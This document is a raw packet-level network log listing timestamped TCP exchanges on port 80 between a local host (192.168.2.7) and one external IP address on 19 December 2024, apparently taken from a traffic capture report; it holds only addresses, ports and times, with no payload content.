Dec 19, 2024 08:47:29.264868021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.265340090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.265346050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.265388966 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.266113997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.266230106 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.266300917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.266874075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.266993046 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.267071962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.267664909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.267735004 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.268073082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.268460989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.268501997 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.268636942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.269285917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.269361019 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.269471884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.270051956 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.270117044 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.270229101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.270901918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.271023035 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.271106005 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.271657944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.271766901 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.271876097 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.272437096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.272479057 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.272824049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.273241997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.273291111 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.273417950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.273988008 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.274034977 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.408508062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.408621073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.408696890 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.408721924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.409120083 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.409198999 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.409508944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.409769058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.409826994 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.410226107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.410459042 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.410520077 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.427551985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.427752018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.427894115 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.428044081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.428195000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.428356886 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.428555965 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.428930998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.429052114 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.429214001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.429584980 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.429713964 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.429718018 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.430042028 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.430130959 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.430521965 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.430826902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.430946112 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.431284904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.431591988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.431663036 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.432073116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.432327032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.432374001 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.432913065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.433085918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.433156967 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.433695078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.433885098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.433970928 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.434485912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.434725046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.434792995 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.435544014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.435672045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.435801029 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.436022043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.436381102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.436439991 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.436738014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.437150002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.437227011 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.437470913 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.438136101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.438193083 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.438330889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.438345909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.438404083 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.439043045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.439815998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.439891100 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.439950943 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.439980984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.440046072 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.440655947 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.441015005 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.441086054 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.441417933 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.441808939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.441934109 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.442302942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.442464113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.442704916 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.443048954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.443227053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.443289042 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.443918943 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.444144011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.444211006 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.444591999 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.444775105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.444855928 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.445394993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.445944071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.446100950 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.446180105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.446465015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.446523905 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.446995974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.447176933 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.447251081 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.447793961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.447978020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.448384047 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.448728085 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.449155092 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.449362993 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.450268030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.450601101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.450654030 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.450978994 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.450988054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.451054096 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.451662064 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.451670885 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.451724052 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.452359915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.452367067 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.452419996 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.453077078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.453085899 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.453130007 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.453733921 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.454191923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.454197884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.454268932 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.454786062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.454869032 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.455178976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.455187082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.455293894 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.455826998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.456187963 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.456295967 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.456589937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.456876993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.456938982 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.457320929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.457637072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.457745075 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.459028959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.459789038 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.459796906 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.459873915 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.460526943 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.460536003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.460547924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.460583925 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.460645914 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.461241961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.461250067 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.461361885 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.461941004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.461947918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.461993933 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.463555098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.464150906 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.464205027 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.464514971 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.464524031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.464596987 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.465182066 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.465189934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.465346098 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.465910912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.465918064 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.466000080 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.466582060 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.466588974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.466649055 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.467363119 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.467370987 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.467423916 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.600586891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.600775003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.600892067 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.600986004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.600994110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.601070881 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.601646900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.601985931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.602032900 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.602480888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.602683067 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.602750063 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.619708061 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.620088100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.620172024 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.620295048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.620302916 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.620378017 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.620975018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.621344090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.621432066 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.621643066 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.621905088 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.622175932 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.622209072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.622718096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.622778893 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.622906923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.623503923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.623600006 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.623706102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.624257088 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.624392986 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.624562025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.625104904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.625227928 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.625770092 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.625931978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.625937939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.626220942 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.626638889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.626790047 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.627404928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.627551079 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.627655983 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.627840996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.627975941 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.628087997 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.628278017 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.628643990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.628732920 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.628993034 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.629369020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.629548073 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.629729986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.630184889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.630229950 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.630417109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.630955935 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.631083965 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.631150961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.631787062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.631841898 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.632498980 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.632673979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.632680893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.632745028 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.633351088 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.633438110 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.633704901 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.634151936 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.634259939 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.634464025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.634912014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.635031939 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.635140896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.635732889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.635739088 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.635879040 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.636497974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.636565924 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.636708975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.637378931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.637423992 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.637808084 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.638147116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.638200045 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.638366938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.638909101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.639062881 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.639080048 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.639667988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.639760971 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.639846087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.640465021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.640516043 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.640657902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.641311884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.641354084 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.641670942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.642096996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.642189026 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.642534971 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.642826080 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.642904043 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.643194914 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.643635035 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.643682003 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.644294977 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.644506931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.644512892 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.644561052 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.645215034 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.645275116 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.645548105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.645972967 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.646023035 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.646213055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.646796942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.646876097 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.647502899 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.647763968 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.647769928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.647810936 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.648422956 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.648492098 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.648749113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.649162054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.649213076 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.649725914 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.650227070 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.650418043 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.650569916 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.650949955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.650957108 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.651164055 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.651614904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.651681900 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.651983976 CET	80	49707	194.87.47.113	192.168.2.7
